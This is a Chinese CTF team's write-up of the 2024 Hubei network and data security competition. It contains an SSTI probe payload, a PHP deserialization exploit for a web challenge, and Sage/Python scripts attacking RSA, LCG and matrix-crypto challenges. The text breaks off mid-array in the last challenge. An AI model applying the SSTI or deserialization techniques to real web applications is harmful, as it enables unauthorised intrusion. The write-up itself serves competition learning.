2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

admin 2024年12月23日10:57:52评论13 views字数 78215阅读260分43秒阅读模式

本文来自权信安网络安全生态圈  

作者天权信安网络安全团队

2024年湖北省网络与数据安全实践能力竞赛

——天权信安WriteUp

✦✦✦

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

排名:线上赛第8名
解题数量:19题

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

解题过程

WEB.01

✦✦✦ 1.速算比赛

直接禁用JS 手动计算30次得到flag

操作内容:

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

WEB.02

✦✦✦ 2.Sal的图集

操作内容:

回显是4,Search处有ssti漏洞

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

代码:

 /search?name={{2*2}}

WEB.03

✦✦✦ 3.popmart

操作内容:

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

代码:

<?php    class popmart{        public $yuki;        public $molly;        public $dimoo;        public function __construct(){            $this->yuki='tell me where';            $this->molly='dont_tell_you';            $this->dimoo="you_can_guess";        }        public function __wakeup(){            global $flag;            global $where_you_go;            $this->yuki=$where_you_go;            if($this->molly === $this->yuki){                echo $flag;            }        }    }    $exploit = new popmart();    $serialized_exploit = serialize($exploit);    echo $serialized_exploit;?> 

CRYPTO.01

✦✦✦4 Mypow

操作内容:

参考链接:

https://blog.csdn.net/luochen2436/article/details/132138412

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

代码:

 题目:+from Crypto.Util.number import *from gmpy2 import *import osflag = b'xxx'def Mypow(b, e, mod):    a = 1    while e:        e >>= 1        b = (b*b)%mod        if e&1:            a = (a*b)%mod    return adef Genp(bit_length):    coeff = 2 ** 5 * 3 * 7    while True:        tmp_prime = getRandomNBitInteger(bit_length - 10)        p = coeff * tmp_prime + 1        if is_prime(p):            break    return pdef Genkeys(bit_length):    p,q = Genp(bit_length),Genp(bit_length)    n = p * q    hint = (2 * p + 7 * q) % n    return n, hintif __name__ == '__main__':    e = next_prime(666)    n, hint = Genkeys(512)    m = bytes_to_long(os.urandom(30) + flag)    ct = Mypow(m,e,n)    print(f'n = {n}')    print(f'hint = {hint}')    print(f'ct = {ct}')    '''    n = 36443283250594259606482132779262570582448178589602577809591307671554949253094255209079689901493052116793388954529442162972106210862341856282788030374324677114528044629385805693771773377070021111949953333360526159026822968061585876873187059674130307295006486032106471182393880915860569773206853864515489855553    hint = 57792516722001523643789088224096258172899052039145876393373730235406451592173971020702024058282699663364267742428240581839287357212741266617791207580236457    ct = 24482128269957355675512496312977308128712253968496848873519792376434347925427116612997489113223781321628516365811583310346553402215907938918891908853234881284620764982626375301219763593402089309909155204943747718536894186749932544428588048770663458669109073657836937287831725958017345747881678942488157429000    '''#sageR.<x> = Zmod()[]f = 2*x^2 + 7*n - hint*xp = int(f.roots()[0][0])q = n//pMypow(b,e,mod)函数相当于pow(m,e,n)函数,但是对于不同的幂e结果不同。当e为偶数时,相当于pow(m,e,n);当e为奇数时,相当于pow(m,e-1,n)。本题的e = next_prime(666),显然是一个素数(必然是奇数),因此真正的e = next_prime(666)-1经计算,gcd(e,phi)=e,因此演变为有限域下开根问题。分别在 G F ( p ) , G F ( q ) GF(p),GF(q) GF(p),GF(q)上开e次方根,之后crt组合一下,求出所有的m,再判断字符串中是否含有DASCTF即可得到flag。#sageimport gmpy2from Crypto.Util.number import  *n = 36443283250594259606482132779262570582448178589602577809591307671554949253094255209079689901493052116793388954529442162972106210862341856282788030374324677114528044629385805693771773377070021111949953333360526159026822968061585876873187059674130307295006486032106471182393880915860569773206853864515489855553hint = 57792516722001523643789088224096258172899052039145876393373730235406451592173971020702024058282699663364267742428240581839287357212741266617791207580236457ct = 24482128269957355675512496312977308128712253968496848873519792376434347925427116612997489113223781321628516365811583310346553402215907938918891908853234881284620764982626375301219763593402089309909155204943747718536894186749932544428588048770663458669109073657836937287831725958017345747881678942488157429000R.<x> = Zmod()[]f = 2*x^2 + 7*n - hint*xp = int(f.roots()[0][0])q = n//pe = gmpy2.next_prime(666)-1R.<x> = Zmod(p)[]f = x^e-ctf = f.monic()results1 = f.roots()R.<x> = Zmod(q)[]f = x^e-ctf = f.monic()results2 = f.roots()for i in results1:  for j in results2:    param1 = [int(i[0]),int(j[0])]    param2 = [p,q]    m = CRT_list(param1,param2)    flag = long_to_bytes(int(m))    if b'DASCTF' in flag:      print(flag)      break

flag值:

DASCTF{FastP0w3r_4nd_AMM_0f_R5A}

CRYPTO.02

✦✦✦5 easycrypto

操作内容:

参考链接:

https://blog.csdn.net/luochen2436/article/details/132964576

题目:

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

代码:

题目:from Crypto.Util.number import *from secret import FLAGm = bytes_to_long(FLAG)def getpq(nbit):    p = getPrime(nbit)    q = getPrime(nbit)    if p > q:        return p, q    else:        return q, pp, q = getpq(512)P = (p - q) & ((1 << 130) - 1)n = p * qleak_p = p >> 256c = pow((1 + P * n), m, n ** 3)print('n =', n)print('leak_p =', leak_p)print("c =", c)# n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287# leak_p = 115314121469787984258489158421056136177545051135641551928888818017665807264468# c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779p高位泄露256bit,但是泄露的bit不够,我们还需要爆破8bit才能copper恢复p。#sagefrom tqdm import *n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287p_high = 115314121469787984258489158421056136177545051135641551928888818017665807264468c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779pbits=512for i in trange(2**8,1,-1):        p4 = p_high<<8        p4 = p4 + i        kbits = pbits - p4.nbits()        p4 = p4 << kbits        PR.<x> = PolynomialRing(Zmod(n))        f = x + p4        roots = f.small_roots(X=2^kbits, beta=0.4, epsilon=0.01)        if roots:                        p = p4+int(roots[0])                 if n%p==0:                        print(i,p)                        break#i = 197,p = 13352463043552409670211183534740157814546713901105410408023687926498813469217507846107364405269402732967687839808637375591530105677153038557366731161035343

计算得到P,接着二项式展开得到

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

解题代码:

import gmpy2from Crypto.Util.number import *n = 135133139540786818977969958456509467902948924003478556140490841984247464940261764739984274397650928404945721248284577232814352745333641188749824519153271662051302477973525156608141358709265683759057060630360909926255299541198485901065352661702656282587105799982740927802530997159098015074633017964344230291287c = 1836794759996264077871820946090708779709415760553736759453665641907562256633157424959089180650539327925671892742819931875681606982615287882656254828326465758462357812873839261469783652663796071814218493268788421243190729887313099383264588659922912876424206670310928514588754069909128149471326084547056385690037197908766053620702238356084124023146075698878494434053246157524775269473152458661801907641122308756667762880284617915774590075511686821816948174618196839335059944389423693187930672934293905608970421003536691336581450927887931599275461176935079227494931457562345640133982771901848553204154760760399724074615092290799119053032875792219794072963200108352944441876206386518960615891547166767499506114294860833404421893612197040731184031783165365621722947731966143226777081983415797778111715332055871302609049501876860012070502369090417942239749695034267695710324328867728296996779p = 13352463043552409670211183534740157814546713901105410408023687926498813469217507846107364405269402732967687839808637375591530105677153038557366731161035343q = n//pP = (p - q) & ((1 << 130) - 1)m = (c-1)//n*gmpy2.invert(P,n) % nflag = long_to_bytes(m)print(flag)#DASCTF{365d0d2cda3a3836a19bf1f46760d875}

flag值:

DASCTF{365d0d2cda3a3836a19bf1f46760d875}

CRYPTO.03

✦✦✦

6 Another+leak+of+LCG

操作内容:此题为原题,找到了代码,发现代码跑不通,更改了一下代码,跑出结果。

种子恢复逻辑:从最后一轮开始,逐步逆推种子。每轮只使用非 * 的有效位,按低位在前构建整数。利用线性同余公式 (seed - b) * inverse(a, M) % M 逆推种子。

恢复 Flag:通过异或运算 flag = c ^ seed 恢复原始 flag,其中 c 是给定的密文。

解码 Flag:尝试不同编码(如 utf-8, latin1),检查是否全是ASCII字符,记录最佳解码结果。

解题公式

种子逆推公式:seed = (seed - b) * inverse(a, M) % M

Flag 恢复公式:flag = c ^ seed

2024年湖北省网络与数据安全实践能力竞赛——天权信安WriteUp

代码:

 from Crypto.Util.number import long_to_bytesc = 16881580266371213879199933551551391657843465997606963348664525781336437594162520786815349648165563542125219063481822246500499434326624995868766335675376062002958905249433093212a = 7048435472566573813031570507837890091364947084306630050544242220147807292350445564322172244244726206563452305566866223414437853917448623276909090327076693b = 9204853069421046007176344891235245198607052139715825810823076231566533652655127030214860066312526149219510111657539481375881111759200483396551737326166933x = ['**********************1*****************************************************************************0******************************************************************************************************************1*************************************************************************************1*********************************************0*********************************************************************************************************************************************************1**********', '**1**************************0*********************1************************************************************************************0**********************************************************************************************************************************1******************************0********************************0********************************1*****************************************************************************************************************************************0*********', '*************************************************************************************1*********************************1*********************************************************************1**********************************************************************************************************************************************************************0*******************************************************************************1******************************************1********************************', '**************************0**************************************************1***********************0******************************************************1*********************************************************************************************************************0*************************1***********************************************************1******************************************************************1*************0*****************************************************************1****', '******0******************************************************1*************0******************************1****1*********************************************1*******************************************************0*********************************************************************************1*****************************************0******************************************************1**********************************************************************1************************************************', '***********************************0******************1**********0*****************************************************************************************************************************************************0*******************************1************************************************************1**************0*************************************1**************************1***************************************************************************************0***********************************', '********************************00************************************************************************00************************************************************************************************************0*******************************0*0********1***********1*1***********1****0***********************************************************************************************************0*********************************************************************0******************************************0', '***************************0******************************************1****************0*************************1**********************0************************************************************************0*************************0***************0****************************0*******1***************1******************0*******************1**********************************************************************************************************************************************0****************0********', '**0********************************************************************************1************************1*************************************************************************1*************************1*************************1***************1*****************************************************************************************************************0**********************************01**************1********************************************************************************************0***', '**1*******************************************************************************1*********************************1******0*****************************************************************************************************1*********************************************************************************************1***************1********************************1*************************************0**0******************************************************************************************************', '********************************************************************************************************************************************************0********************************************0***0*************************************************************0*******1***********************0****************************1*********************************************************************************************0**********************************************0*******1**********************************0***', '***************************************************************************************************************************0**********************1*********0*********************************************************************************1*******0**********************************************************0*************************************************************************************************1************************************************************************************************************', '******************************************************************************************************0************1**0******************************1******************************************1****************************1******0*****************************************************************************************************************************************************0*******************0*********************0*******************************************************************************************', '****1************1***********************************************************************************************************1*****************************************************1***************************************************1**********************************************************************************************************************0*******************************0*****************0*************************1********************************************0*********0**0***1***********************', '******0************************************************************************0***************************************************************************************************************************************************************1**************************************************************************************************************************************************************1********************1********1**************************************************0******************0*************', '**********1********************************1*****************************************************************0*****************************************************************************************************************************************1***1***************0*******************1******************************************************************0****************************************01*****************************************************************************************************************0*', '**********1**************************************************************************************************************************************************************************************************************************************************************************************1******************0******************************************************************************************************************************************************************1****************************************', '**************************************************************************************************************************************0************************************************************0***************************************************************************************************************************************************************************************************0***********0**************************************************************0***************1*****************************', '*******************************************************0*********************************************************************************************************************************1****1****************************************************************0*******0*****************************************************************************************************************0***************0*******************************************************************************0**************************************', '*******11***********1*************************1****************************************************************************************************************************************************************************1******************0******************0************************************************************************************************0*****************1*****************************************************************************************************************************************0*', '******************************************************************1****************************************************************************************************0**************************************************1********************************************************************************************************************************************************************************************************************************************************0*******1***************************1********', '*******************0**************************************************0****************************************************1*************************************1*********************************************************************************************************************************************************0***************0*******0***************************************************0*******************************************************************************************************1**0*************', '********************1**********1*******************************0*********************11*************************************************************0*************************************************************************0******************************************************************0**********************************************************************************1***************0**1*****************1*********************************************************0********************************************', '*************************0********************************************************************************************************0**************01************0************************************************1*****************0**************0*********************1*********0************0*****************************************1***1**************************************************************************0**********************************************1************1********************************************', '*****************************************************************************1***************1*****1***********************************************************************************************************************0****************************************************************************************************1*************************0****************1*************************************************************************0**************************************************************************', '***************1**********1**********************************************************0***************************************************************************************************************0**************0**********1*******************************1*****************************************************************************************0**********************************************************************************************0******************************************************************0****', '***1*****************************************************************************************************0***************************************************************************************************************1**************************************************0***************0********************************************************1*******************************************1*****************************************************************************************************************0************', '*********************************************0*1***************************************************0****************************************************************************************************1********************************************************************************************************0*******************************0**************************************************0**********0***********1********************************************************************1**********************0***0***1', '************10*******************************************0**********************************1************************0****************************0*************************************************************************************************1***************************0****0*1**********************************************1******0*************************************************1********************************************************************************************************************************', '**************************************1*************0**************1*************1*****************0**********1****************************************************************************************************************************************************************************************************************************************************0********************1*******************0************************************************1***************1**************************************************', '**************************************************************************************************************1****************0*************************1****0******************************************0****************************************************************0***********************************************************************0*************************************************0**********************0**********************************************0**1**************************************************', '******************************************0************************************************************00***********************************************************************************************************************************1*************************************************************************************************************************************************************1***********************1**************************0******************************************************************', '******************************************************************************************************1*1***********0*************************************************************0********************************************************************************1*********************************0*******1********************************************************************************************1*****************************1*************************1*************************************1***********************', '**************0******0*************1*********0************************************1******************0**1****************************************************************************************************************************0*************1****************************1****************************************1***********************0*****************************************************************************0********0*1******************1**********************1*******************************************', '***************************1***************************************************************************************************1**********************************1******************************************1********************************************************************************************************************0*********11*****************************************************************************************************************************************************1****************************', '***********************************************************************************************************1*******************************1***********************1*****1**************************************************************************************************1**************0*******1*************************************1**********************************************************************************************************************************************1********************************1******', '***************************************************************0**0************************************0********************************************************************************************************0**************************1*********************************************1************************************************************************1***0*************************************************1************************************************1********1***************0********************1********', '*****************************************0**0******************0***************************************************************1*********1**1***************************************************1***********************************************0***************************0**********1********1*****************0*************************************************0***********************0**********************************1******************************************************************10****************************', '********************************************************************************************************************************************************************1****************************************************1****************************************************************************0***************************************************************************************************************************************0**********************************************************0**********************', '**********************************0**************************************************0*************************************0**********************************0**********************************************************************************0*****0***********************************************************0*************************************0***************************0******************************1*0*********************************************************************************************************', '**************************************************************************************************************1***0*********************0***************************0**************************1*****************1****************************************************************************************************************************************************************************************************************0************************0********************************************************************', '*****************************************************************1************************************0*****************************0*******************************************************0********************0*********************************************0***********************0*****0****************************************************************************0**********************0**1***************************************************************************************************************************', '**********************************************************1*****************1**************************************************************0****************************************************************1**************************************************************************************************************************************0*********************************************************************************************1******************************************************************************', '***************0***************************************************************************0************1***************1**************************************1************1**************************************************************************************************0*************************************************************************************************************************************1************************************************0*********************************************************', '*******************************************************************************************************************10**********************************************************************************************************************************1*******************0**********0**********1*****************************************************0******************************************************************************1***0*****************************************************************1*******************', '******************************00***********0**************************************************0***************************************************************************0************0*****************0****************************0******************************************************************************************************************************************************************************1***************0*****************************0******************0*****************************************', '*********************0*****************************************0*********************1****************1***************************10*************************1**********0***************************************************************************************************************************************************************1************0********************************************0*****************************************************************************************************************************', '***************************************************1*01*********************1***************************************1************************1*******0******************************************1*******************************************************************************0********************1**0*****0******************************************************************************************0*1********************************************************************************************************************', '***************************1*******************1*****************************************************************************************0*****************************************************************************************************************************0*****************************0*********************1*****1*************************0***************1******************1***********************************************************0******************************************0*1************************', '****************************1******************************************************************************0****************0**********************************************************************************************0**************************************************1********************************************************************************************************1***********************0***************************1*********************************0****************************0*********************', '*********************************************************1***************************************0**********************************************************0***************************1*******************************************************0*********************************************************************************************************************1***************************0****************************0*1**************0***************************0***************************************************', '**************************0******11*******************************************************************************0**********************************************************0****************************1**********0**********************************************************************************************************************************************************************************************************************************************************************************************************', '*******************1*****************************************************************************************************************************************************************************************0************************************************************************************1**********************************************************0*************0***************************************************************************************************1************************************************', '***************1***********************************0*********1********************0***********************1*************************************1*********************************************************************0***********************************************************************************************************************************************************************************************************************0***********************************************0*********************************', '****************************1**************************************************************************************************************************1*****0***************************************************************0**************************0*1************0****************************************0***********************************0*****************************************************************************************************************************************************0*********************', '*********************************************************************************************************0*********************************0*********************************1************00***0*******************************************************************************************1***************************************************************0************************************************************************************************1********************************11*******************************0*', '**1*******1************************************************************0*************************************************************************0*****************************************************0***************************************************************************************************************************************0***************************************************1***************************************************************0************************0***********************************', '***********************************************************************************************************************0*******************************************1*************************************1**************************************************************************************************************************0*******************************10*****************************************************************************1**********************************************0*****************************', '******************************************************************00*****************************************************************************************************************************************1****************************************************************************************************1***0******************************************0*************0*************************************************0*******0*****************************************************************1********************', '***************************************************************************************0**********1***1****0*****0*****************0********************************************************************************************************************************************************1***********0*****1***********1*****************************************************************************************************0*1*************************************0*******************************************************', '****************************************************************************************1***********************0********1*************1****************************************************************************************************************************************************************************************1***0*******1***************************0**********************0****************1************************************************************************************************************1**', '*********************************************************************************************************************0**************1******************************************************************************1********0****0********************************************1*******************************0******************1***************************************1*********************************************************0**********************************************************************1*********************', '********************0*************1*********************************************0*****************************************************************************************************************************************************1**********0**************************1******************************************************************1********************************************1*******************************************0****************************************************************************0**********', '*************************************************************************1***********************************************************0*************************************************************************1********************************0*************0*******************************************************************1**********************************************************************1********0*************************************************************************************************************']T = 64def gen(s, M):    xx = []    for _ in range(T):        s = (a * s + b) % 2**M        xx.append(bin(s)[2:].zfill(512))    return xxXX = []def check_seed(s, length, comparison_list):    seed = int(s, 2)    X = gen(seed, length)    for i in range(length):        for j in range(T):            if comparison_list[j][-i-1] != "*" and comparison_list[j][-i-1] != X[j][-i-1]:                return False    return Truedef find_possible_seeds(prefix=""):    if len(prefix) == 512:        if check_seed(prefix, len(prefix), x):            XX.append(int(prefix, 2))    else:        for bit in ('0', '1'):            new_prefix = bit + prefix            if check_seed(new_prefix, len(new_prefix), x):                find_possible_seeds(new_prefix)XX = []  # 存储找到的有效种子find_possible_seeds()print(XX)for SEED in XX:    print(long_to_bytes(c ^ SEED))

CRYPTO.04

✦✦✦ 7 QAQTAT

操作内容:

参考链接:

https://dexterjie.github.io/2024/12/01/%E8%B5%9B%E9%A2%98%E5%A4%8D%E7%8E%B0/2024%E7%AC%AC%E4%BA%8C%E5%B1%8A%E7%A6%8F%E5%BB%BA%E7%9C%81%E6%95%B0%E6%8D%AE%E5%AE%89%E5%85%A8%E5%A4%A7%E8%B5%9B/#QAQTAT%E2%80%94%E2%80%94Unsolved

代码:

from Crypto.Util.number import *from hashlib import sha256from secret import flagm = bytes_to_long(flag)def enc(pt, G, A, T, S, p):    s = randint(0,p-1)    D = G^s    E = A*T*A    F = D*E*D    K = list(D*S*D)    key = sum(K[0])+sum(K[1])+sum(K[2])    mask = int(sha256(str(key).encode()).hexdigest(),16)    ct = pt ^^ mask    return ct, Fdef dec(ct, Q, F, p):    K = Q*F*Q    key = sum(K[0])+sum(K[1])+sum(K[2])    mask = int(sha256(str(key).encode()).hexdigest(),16)    pt = ct ^^ mask    return ptp = getPrime(256)Fp2.<i> = GF(p^2, modulus=x^2+1)M = MatrixSpace(Fp2, 3, 3)while True:    Q = M.random_element()    A = M.random_element()    if Q*A != A*Q:        breakT = Q*A*QS = T*A*Tr1 = randint(0,p-1)G = Q^r1pk = (list(A), list(T), list(S), list(G))ct, F = enc(m, G, A, T, S, p)print("p = ",p)print("pk = ", pk)print("F = ", list(F))print("ct = ", ct)"""p =  72887242108660141996862343556330151015969690949835567252527194788428065480383pk =  ([(17721183402259872020800275954210023274983052570120081248291897425608931477093*i + 32398110280895896734010284949974832063887503132353681078977206899204202173789, 54531634495057046991515273558305428867102201405617856305008554208336946545276*i + 53559176432820530464958340934397135653021175198597495321065224929188410347695, 27719945502856754481236098196014205483081586087367078493933408080194499938927*i + 1450628736387393873166171805424299538505476789523674611289973478290718453200), (57242423786686483363839647362581564383925732392730073374546590355998555747077*i + 573726326354574516128249317235875704460857319673337707555095009277545125755, 33631043256657770245013631632455702904903259491780484310654749784948198388976*i + 17344746653834202604930860577508757708688427949046279718508635007113840369042, 37771390186920740637371383242878514021347606565375600086363978842439775164973*i + 60264754185911116825495147907207494752330900415794996812483089251259003404228), (1163730453993018743008743150834548760986076138562570206571825145859591284352*i + 69245390362211526197537288211735612650619880945856387683074182933575799994162, 11137807706588795799057940108843238078078690609437386007163034291855328303661*i + 50795522649623533714787572047531722836395032085224035511036953078383612475598, 14354786571703727534706086386589187674076604263117377684131521866407943036307*i + 63028649680815097939155846824928638616844025040257105384123424769274942520895)], [(22137116252880790433838296157765927318220905592359967466680754349755815464341*i + 35503968364379821899511866562472775961434113516937033217642581531414863539290, 38346074307552448152239080224505166810289185210503265380269711384969731945517*i + 9333819647786551924409858116441570177115099865486742684028611902450000042407, 24608192510515673607042276468532809071945836783394960695059783085937608049755*i + 27099766371861599260580052331632986107092105438254563604629919595057370886149), (57539731529782952718529369617033412770127782205874818027724894673104814770991*i + 12431864123786174601413168140961685219607645783666490625760143190724674574386, 33510082449726132893492104159133966168598115972734064630878005553829725389082*i + 30594711977745700371548334707069524826346332947574826081979927125841475148328, 8911862104171403632946802970568635607253840071000107875759139060453368618583*i + 51594672749496705581452789883241278156858476777167382827032876227546058970732), (58105830161247358431125768499050987088161417325586965601350797391396603985470*i + 10949064084676782939947256128733523229613253182051362970560478801614590446300, 6665352489343222248969975791152178151760060704226637217535985452272551528693*i + 16163109497937280055564868323730465088174193174761590036929535644203224067166, 26147088265849488467397913386934580340556987670869413865359802108333761377560*i + 14170094609019059182842713618319151553137248441974849089555832123638494739417)], [(60066006389024369318961505483331049048095679333675437984483948643792214278503*i + 67617085525047580942273623886038114942547589259839196477555874755427651308048, 38692305959834079988532869421062338838072016075793686080934562521314366274998*i + 21104829450473981189549299039898127784065322316764325995863199136802573514, 7207625628360021282792621977024027446511231977201394776410095364976996279450*i + 23039079766688651678553952766794875180844089420934577132338235904018762773928), (10808368042897084491009063074724200907600038030639153659288985642861405920614*i + 33955795465220353002933680692690511153845418737513482128237117905262919879043, 21645210772494061734726430463955231707074915293749580279327741388687068110310*i + 62225984739450865202997071369617271241348810092608626482294704825641320606694, 14572118842071162051223076904993643512402905544627821044103215186921277812496*i + 63504547636870837320642724540312613748726280369811190421219651308407770510674), (6529211642735966744323364626486352288002532267939478445216264742350974653419*i + 43426895500365913698127867498420593427453574994051597107529725996420257433857, 66636149494607064863031794353485502915121295051850619450321561966293398587284*i + 51049172134567530748763269555600518661288880531459625871071308764595168859033, 42297258788816007263333796194491196601979606573843177791726417124128570106777*i + 45527674821983322767637713856131638914194577467349514130179266972864796164733)], [(47645610858583239528541540288030905132801730740336899517917521534427703920375*i + 13272393664089987551368548207128885229248289454405159277755757369580866096516, 60503024931869977830369448001966194434192750710631225090391559259672930497207*i + 22742672333325631628906219543935772962495637869131049729874762344108069789046, 18239371575343144081671835175136676417172797381923442300525086630600561560114*i + 53605095942301227312866863441233162082087535371838738595931070092230378325532), (49652795839344946948771531270341537200526957150620826334216871981974859849848*i + 72788891932812016325514298655742330969740202920835574638161526839627026310392, 58465406030985457122487065262985150103086610852826560192123766406670919681919*i + 41631921368744416558173670147590406285376603436284660888096365325833457519047, 2867068797023070369258694926242485369317317985428997150826022662547346928319*i + 199536555238705400453079146297641296197748614855192340202929119323998667173), (19319782936524636558881137449470396788888469756320580071801690941326971557928*i + 34694728896207512382372151140975478616355941017631874070450334268575015485538, 60420266086997924618637147844041161464210208935194926422677077391866663978425*i + 13672363312837218411993834816309940812825734002380106434784905443915361955247, 56317025568717741728727542740124505299029374963112095990350877412868385510001*i + 56960621295573230601502052571104746367180500789238336757504091383665514782189)])F =  [(36081831373398765496490121898118275331597167308301671911642273861563666664545*i + 20818485079783326431414952124332440995164298376805349071762867760925654560129, 2080527476644284459469754065728582261439110792635520661740429151724797376184*i + 22485923248080983391383279592637691489160934672854638306617785344436031827838, 15544373162545014827602222261755865080947187122261471926061663568794038512828*i + 65994932829738499994169748656063604384011854387402875895186473718226656419067), (3553534440103543686958858303956716887328727627636404431097647427819509340361*i + 41182149981825439188243414995474733005799065992663037326956422731949977723727, 11444151159046255413538671703716370245288291793592500278345001664024824339590*i + 1802783416049323926195923226865768221398255563865542946492803065162093093803, 15739175840903697568714274177182938758189586472507039731239155962622285528109*i + 38249065906628598713138583591858150126778794837077688369911160900556744463900), (14364753807737302773559096493138893453118094354943941768609481298414054855231*i + 16290236676179704559365899211744462983770375364688247022596145726641137243214, 3863306473986430132042752882629555431418515741358351198972027547882636615940*i + 1209446834271293681961506708684952401569936830292701272655835127315444154958, 21868026584808712490812183410257662299067350008298604021123682243508255905173*i + 12828201007038003022201361213007595366913298546122923089499182187938898042596)]ct =  96910798667771988374291172958072220832574586618080134344021393928577220469428"""step1from Crypto.Util.number import *from hashlib import sha256def enc(pt, G, A, T, S, p):    s = randint(0,p-1)    D = G^s    E = A*T*A    F = D*E*D    K = list(D*S*D)    key = sum(K[0])+sum(K[1])+sum(K[2])    mask = int(sha256(str(key).encode()).hexdigest(),16)    ct = pt ^^ mask    return ct, Fp =  72887242108660141996862343556330151015969690949835567252527194788428065480383Fp2.<i> = GF(p^2, modulus=x^2+1)M = MatrixSpace(Fp2, 3, 3)pk =  ([(17721183402259872020800275954210023274983052570120081248291897425608931477093*i + 32398110280895896734010284949974832063887503132353681078977206899204202173789, 54531634495057046991515273558305428867102201405617856305008554208336946545276*i + 53559176432820530464958340934397135653021175198597495321065224929188410347695, 27719945502856754481236098196014205483081586087367078493933408080194499938927*i + 1450628736387393873166171805424299538505476789523674611289973478290718453200), (57242423786686483363839647362581564383925732392730073374546590355998555747077*i + 573726326354574516128249317235875704460857319673337707555095009277545125755, 33631043256657770245013631632455702904903259491780484310654749784948198388976*i + 17344746653834202604930860577508757708688427949046279718508635007113840369042, 37771390186920740637371383242878514021347606565375600086363978842439775164973*i + 60264754185911116825495147907207494752330900415794996812483089251259003404228), (1163730453993018743008743150834548760986076138562570206571825145859591284352*i + 69245390362211526197537288211735612650619880945856387683074182933575799994162, 11137807706588795799057940108843238078078690609437386007163034291855328303661*i + 50795522649623533714787572047531722836395032085224035511036953078383612475598, 14354786571703727534706086386589187674076604263117377684131521866407943036307*i + 63028649680815097939155846824928638616844025040257105384123424769274942520895)], [(22137116252880790433838296157765927318220905592359967466680754349755815464341*i + 35503968364379821899511866562472775961434113516937033217642581531414863539290, 38346074307552448152239080224505166810289185210503265380269711384969731945517*i + 9333819647786551924409858116441570177115099865486742684028611902450000042407, 24608192510515673607042276468532809071945836783394960695059783085937608049755*i + 27099766371861599260580052331632986107092105438254563604629919595057370886149), (57539731529782952718529369617033412770127782205874818027724894673104814770991*i + 12431864123786174601413168140961685219607645783666490625760143190724674574386, 33510082449726132893492104159133966168598115972734064630878005553829725389082*i + 30594711977745700371548334707069524826346332947574826081979927125841475148328, 8911862104171403632946802970568635607253840071000107875759139060453368618583*i + 51594672749496705581452789883241278156858476777167382827032876227546058970732), (58105830161247358431125768499050987088161417325586965601350797391396603985470*i + 10949064084676782939947256128733523229613253182051362970560478801614590446300, 6665352489343222248969975791152178151760060704226637217535985452272551528693*i + 16163109497937280055564868323730465088174193174761590036929535644203224067166, 26147088265849488467397913386934580340556987670869413865359802108333761377560*i + 14170094609019059182842713618319151553137248441974849089555832123638494739417)], [(60066006389024369318961505483331049048095679333675437984483948643792214278503*i + 67617085525047580942273623886038114942547589259839196477555874755427651308048, 38692305959834079988532869421062338838072016075793686080934562521314366274998*i + 21104829450473981189549299039898127784065322316764325995863199136802573514, 7207625628360021282792621977024027446511231977201394776410095364976996279450*i + 23039079766688651678553952766794875180844089420934577132338235904018762773928), (10808368042897084491009063074724200907600038030639153659288985642861405920614*i + 33955795465220353002933680692690511153845418737513482128237117905262919879043, 21645210772494061734726430463955231707074915293749580279327741388687068110310*i + 62225984739450865202997071369617271241348810092608626482294704825641320606694, 14572118842071162051223076904993643512402905544627821044103215186921277812496*i + 63504547636870837320642724540312613748726280369811190421219651308407770510674), (6529211642735966744323364626486352288002532267939478445216264742350974653419*i + 43426895500365913698127867498420593427453574994051597107529725996420257433857, 66636149494607064863031794353485502915121295051850619450321561966293398587284*i + 51049172134567530748763269555600518661288880531459625871071308764595168859033, 42297258788816007263333796194491196601979606573843177791726417124128570106777*i + 45527674821983322767637713856131638914194577467349514130179266972864796164733)], [(47645610858583239528541540288030905132801730740336899517917521534427703920375*i + 13272393664089987551368548207128885229248289454405159277755757369580866096516, 60503024931869977830369448001966194434192750710631225090391559259672930497207*i + 22742672333325631628906219543935772962495637869131049729874762344108069789046, 18239371575343144081671835175136676417172797381923442300525086630600561560114*i + 53605095942301227312866863441233162082087535371838738595931070092230378325532), (49652795839344946948771531270341537200526957150620826334216871981974859849848*i + 72788891932812016325514298655742330969740202920835574638161526839627026310392, 58465406030985457122487065262985150103086610852826560192123766406670919681919*i + 41631921368744416558173670147590406285376603436284660888096365325833457519047, 2867068797023070369258694926242485369317317985428997150826022662547346928319*i + 199536555238705400453079146297641296197748614855192340202929119323998667173), (19319782936524636558881137449470396788888469756320580071801690941326971557928*i + 34694728896207512382372151140975478616355941017631874070450334268575015485538, 60420266086997924618637147844041161464210208935194926422677077391866663978425*i + 